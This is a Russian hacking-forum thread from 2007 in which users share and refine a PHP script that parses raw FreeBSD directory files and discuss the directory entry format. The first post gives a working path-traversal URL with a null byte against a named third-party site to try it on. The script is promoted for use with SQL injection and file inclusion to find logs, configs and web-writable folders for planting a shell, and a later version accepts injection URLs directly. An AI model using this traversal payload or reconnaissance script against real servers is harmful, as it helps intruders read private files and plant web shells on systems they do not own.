скрипт для парсинга файлов каталогов

Обсуждение в разделе «Избранное», начал(-а) Scipio, 7.12.2007.

  1. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    скрипт для парсинга файлов каталогов,
    испытать его можно на gerz.ru:
    идем по ссылке:
    Code:
    http://www.gerz.ru/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/%00
    сохраняем полученную страницу на диск в папку со скриптом
    в строчке $fl=file_get_contents("file"); прописываем имя файла...

    как выяснилось на FreeBSD можно читать не только обычные файлы, но и файлы каталогов с помощью например комманды cat или средствами php

    скрипт бывает полезен, когда например есть sql инъекция с возможностью чтения файлов, то для того чтобы искать логи или конфиги апача, да даже для того чтоб найти путь к папкам доступным из веба, допустим для записи шелла, также при инклюдах (на Free BSD конечно же), вобщем must have, если сейчас не нужен, то пригодится позднее, также его несложно переделать под функцию и использовать в эксплоитах ;)

    PHP:
    <?php
    error_reporting
    (E_ALL);
    $fl=file_get_contents("file");
    $s=bin2hex ($fl);
    $ln=strlen($s)-5;
    $nam=FALSE;

    for (
    $i=0;$i<$ln;$i+=2)
       {
           
    $curhex=substr($s,$i,3);
           
    $nexthex=substr($s,$i+4,1);

           if ((
    $curhex=='040') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[DIR] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if ((
    $curhex=='080') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[FILE] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if (
    $nam===TRUE)

               {

                if ((
    $s[$i]>'1') and ($s[$i]<'8'))
                    {
                     
    $hx=substr($s,$i,2);
                  
    $hx=chr(hexdec($hx));
                  
    $pob=$pob.$hx;
                 }
             else {echo 
    $pob$nam=FALSE;}
            }


       }
    ?>
     
    _________________________
    Это одобряют 16 пользоветелей.
  2. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    работает он так:

    в файле каталога я заметил такую особенность, перед именем файла или каталога идут два байта первый из них принимает значения или 04 или 08, второй байт везде не больше 15 в десятичной си т.е. в шестнадцатиричной си начинается на 0...

    так вот, если этот первый байт 04, то за этими двумя байтами идет имя каталога, а если 08, то это имя файла, насчет ссылок я не выяснил, но выяснить постараюсь...

    большая просьба к тем кто будет использовать скрипт, отписаться тут о его работе, меня смущает именно этот второй байт, может ли он принимать значения больше 0f, если всетаки может, то скрипт будет работать неправильно и не отображать некоторые имена
     
    _________________________
  3. VampiRUS

    VampiRUS Elder - Старейшина

    Регистрация:
    31.12.2005
    Сообщения:
    219
    Одобрения:
    105
    Репутация:
    45
    помойму не только во FreeBSD, вроде во всех Unix like системах каталоги приедставлены в виде файлов(на счёт всех могу ошибаться).
    за скрипт +
    сам хотел как-нить подобный написать.
     
    #3 VampiRUS, 12.12.2007
    В последний раз редактировалось: 12.12.2007
  4. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    да, ты прав, во всех Unix like системах каталоги приедставлены в виде файлов, но только во FreeBSD эти файлы можно читать с помощью ЯП или cat например, из всего что я пробовал это получается только во FreeBSD
     
    _________________________
  5. guest3297

    guest3297 Banned

    Регистрация:
    27.06.2006
    Сообщения:
    1 315
    Одобрения:
    639
    Репутация:
    436
    Бред.
     
    Это одобряет 1 пользователь.
  6. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    В чем бред то?
     
    _________________________
  7. Goudini

    Goudini Elder - Старейшина

    Регистрация:
    7.06.2006
    Сообщения:
    135
    Одобрения:
    134
    Репутация:
    61
    факт! нампример при sql-иньеции (os FreeBSD) можно прочитать содержимое директории через select null, null, null, load_file('/etc')....
     
  8. Macro

    Macro Elder - Старейшина

    Регистрация:
    11.11.2006
    Сообщения:
    556
    Одобрения:
    298
    Репутация:
    139
    Хорошая штука, но что делать если выводится кроме файла каталога еще другая инфа?
     
  9. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    Я не совсем понял о какой инфе ты говоришь, но если я правильно тебя понял, то эта инфа просто проигнорирует ся в большинстве случаев, так как там идет поиск по байтам со значением 04 и 08 и причем следующий байт после них должен тоже быть не больше 0Fh
     
    _________________________
  10. ZaCo

    ZaCo Banned

    Регистрация:
    20.06.2005
    Сообщения:
    757
    Одобрения:
    335
    Репутация:
    186
    да куда проще было бы не "реверсить" и изучать устройство каталога, а просто выводить подстроки состоящие из печатаемых символов. просто возможен вариант, что к примеру атрибуты файла (права, время модификации и тп) представленные в бинарном виде, буду содержать то что ты ищешь и на что парсишь, хотя конечно врядли..

    >>да, ты прав, во всех Unix like системах каталоги приедставлены в виде файлов, но
    >>только во FreeBSD эти файлы можно читать с помощью ЯП или cat например, из
    >>всего что я пробовал это получается только во FreeBSD

    точно, просто фс'мы, например, linux'ов пишут в errno, при вызове open на каталог, ошибку EISDIR, этим они, мягко говоря, советуют пользоваться другими вызовами для работы с каталогами, странно почему в бсд это можно делать непосредственно..
     
    Это одобряет 1 пользователь.
  11. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    Хм, насколько я знаю, что в файле каталога нет информации о правах доступа файлов которые в нем находятся,в нем имена и ссылки на физическое месторасположение (ну и еще что то).
    Насчет вывода подстрок из печатающих символов, тогда будет много мусора, потому что "служебные" байты принимают значения такие же как и печатаемые символы, если выделять подстроку как несколько подряд идущих петатаемых символов, то файлы и каталоги состоящие из одного символа выводиться не будут,к тому же не будет возможности определить является это файлом или каталогом.
    Насчет самого парсинга и поиска, я думаю, той ситуации которую ты описал не возникнет (я думал об этом). Там видишь какая фигня, сначала ищется байт со значением 04h или 08h проверяется следующий за ним байт, является ли он меньше 0Fh и идет проверка является ли идущий за этими двумя байтами байт печатаемым символом... надеюсь ты понял что я хотел сказать,а то я че то понаписал и сам не совсем понял:)
     
    _________________________
  12. ZaCo

    ZaCo Banned

    Регистрация:
    20.06.2005
    Сообщения:
    757
    Одобрения:
    335
    Репутация:
    186
    >>Хм, насколько я знаю, что в файле каталога нет информации о правах доступа файлов
    >>которые в нем находятся,в нем имена и ссылки на физическое месторасположение (ну
    >>и еще что то).

    да, щас немного поэксперемнтировал с жесткими ссылками оказалось, что права приписываются непосредственно к идентификатору файла.

    >>Там видишь какая фигня, сначала ищется байт со значением 04h или 08h
    >>проверяется следующий за ним байт, является ли он меньше 0Fh и идет проверка
    >>является ли идущий за этими двумя байтами байт печатаемым символом...

    все-таки реверсить нужно:) я сейчас изучал методом тыка что пишется в каталог и оказалось, что там идет имя файла, его идентификатор, тип (обычный файл, каталог, символическая ссылка) и еще пара байт смысл которых мне пока не ясен, да и вообще не понятно зачем хранить тип файла когда это можно прикрепить непосредственно к inode.

    вот програмка производящая вроде бы грамотный парсинг http://zaco.info/bsdir.cpp
    интересно что идентификатор всегда выравнивается по машинному слову, а иногда программа выводит несуществующее файлы, причем идентификаторы которых, на первый взгляд вполне валидные.. я думаю определить удаленные файлы одним непосредственным парсингом каталога не удасться, нужно лезть в таблицу inode и смотреть есть ли там этот дескриптор или нет.

    вообще конечно жалко, что бсд позволяет выполнять вызов open только с флагом O_RDONLY, иначе можно было бы много пакостей наделать:)
     
    Это одобряет 1 пользователь.
  13. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    ZaCo, не плохо, очень не плохо... но согласись, мой вариант имееет возможность для большей реализации на практике, т.к. именно в инете это находит свое практическое применение, и согласись вариант на пхп именно этот имеет место быть, насчет ссылок, в конечном итоге, я тоже нашел, что байт 0Ah-это символическая ссылка, просто не стал включать в скрипт, потому что чем больше значений, тем больше вероятность неправильного парсинга... я вот немного тебя непонимаю, наверное ты просто не в той последовательности рассказал, но насколько я понял, что первые три байта дискриптора файла или каталога отвечают именно за физическое место расположения, и по закону жанра справа на лево... а вобще по идее респект тебе ZaCo, и уважуха, только ты меня по нормальному понял, и поэкспериментировал, т.е. занялся тем, чем занимался я до создания этого топика... но еще раз хочу сказать спасибо Macro, он профессионал, его стоит уважать
     
    _________________________
    #13 Scipio, 16.12.2007
    В последний раз редактировалось: 16.12.2007
  14. ZaCo

    ZaCo Banned

    Регистрация:
    20.06.2005
    Сообщения:
    757
    Одобрения:
    335
    Репутация:
    186
    >>я вот немного тебя непонимаю, наверное ты просто не в той последовательности
    >>рассказал, но насколько я понял, что первые три байта дискриптора файла или
    >>каталога отвечают именно за физическое место расположения, и по закону жанра
    >>справа на лево...

    не совсем, идентификатор файл (он же дескриптор файла в файловой системе) это число, но само расположение файла, берется из таблицы inode (хотя по логике вещей это все-таки должно быть бинарное сбалансированное дерево для быстрого доступа к данным, просто так короче) ровно по этому идентификатору. а описание структуры содержимого каталога описано в struct DIR в bsdir.cpp. только нужно понимать, что все наши с тобой скрипты по-хорошему должны работать только в пределах одной фс ну или максимум совместимых.
    --
    и еще раз об выравнивании, если ты с++ не знаешь: сначала считывается структура DIR (inode - 4 байта, 2 байта не ясно чего, 1 байт - длина имени файла), далее само имя файла, а затем происходит скачок до ближайшего, кратного sizeof(int) (для gcc при стандартных настройках) адреса относительно начала данных.
     
    #14 ZaCo, 16.12.2007
    В последний раз редактировалось: 16.12.2007
  15. ZaCo

    ZaCo Banned

    Регистрация:
    20.06.2005
    Сообщения:
    757
    Одобрения:
    335
    Репутация:
    186
    оказалось тут даже без выравнивание можно, заодно и смысл dontknow прояснился - длина текущего описания, в типе short int.
     
  16. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    вот сделал поудобнее немного и сделал, чтоб он символические ссылки опознавал:
    PHP:
    <html>
    <head>
    <title>Парсинг каталогов FreeBSD от Scipio</title>
    </head>
    <body>
    <?php
    error_reporting
    (0);
    set_time_limit(0);
    if (isset(
    $_POST['pole'])){$pole=$_POST['pole']; $fl=file_get_contents($pole);} else $pole='';
    ?>
    <form method="post" action="<?=$_SERVER['SCRIPT_NAME']?>">
    <input type="text" size="150" name="pole" value="<?=$pole?>"/>
    </form>
    <?php
    if (!empty($fl))
    {
    $s=bin2hex ($fl);
    $ln=strlen($s)-5;
    $nam=FALSE;

    for (
    $i=0;$i<$ln;$i+=2)
       {       
    $curhex=substr($s,$i,3);
           
    $nexthex=substr($s,$i+4,1);

           if ((
    $curhex=='040') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'<b>[DIR]</b> ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if ((
    $curhex=='080') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'[FILE] ';
                
    $nam=TRUE;
                
    $i+=4;
               }

            if ((
    $curhex=='0a0') and ($nexthex>'1') and ($nexthex<'8'))

               {
                
    $pob="<br>".'<i>[LINK]</i> ';
                
    $nam=TRUE;
                
    $i+=4;
               }

           if (
    $nam===TRUE)

               {

                if ((
    $s[$i]>'1') and ($s[$i]<'8'))
                    {
                     
    $hx=substr($s,$i,2);
                  
    $hx=chr(hexdec($hx));
                  
    $pob=$pob.$hx;
                 }
             else {echo 
    $pob$nam=FALSE;}
            }


       }

    }
    ?>
    </body>
    </html>
    в строку можно вводить как имя файла, так и сетевой адресс (строку URL) например URL с SQL-инъекцией, сам пользуюсь и много раз уже выручало
     
    _________________________
    Это одобряет 1 пользователь.
  17. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    Хм, скрипт показывает и недавно удаленные файлы, ответ на вопрос почему мне дал ZaCo:
    хотя об этом нетрудно догадаться, но все равно ему спасибо, другой вопрос как это можно использовать, жду предложений
     
    _________________________
  18. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    728
    Одобрения:
    539
    Репутация:
    138
    UPD: скрипт работает и для SunOS
     
    _________________________
    Это одобряет 1 пользователь.
  19. HornetBlack

    HornetBlack New Member

    Регистрация:
    28.10.2007
    Сообщения:
    27
    Одобрения:
    13
    Репутация:
    8
    За типом файла идет short int = длине имени. Я так понимаю, более ничего полезного из дампа каталога получить не удастся...
     
  20. mailbrush

    mailbrush Elder - Старейшина

    Регистрация:
    24.06.2008
    Сообщения:
    2 165
    Одобрения:
    954
    Репутация:
    131
    HornetBlack, а я так понимаю, ты хочешь минус получить. Прошло больше года =\. Это археология =\
     
Loading...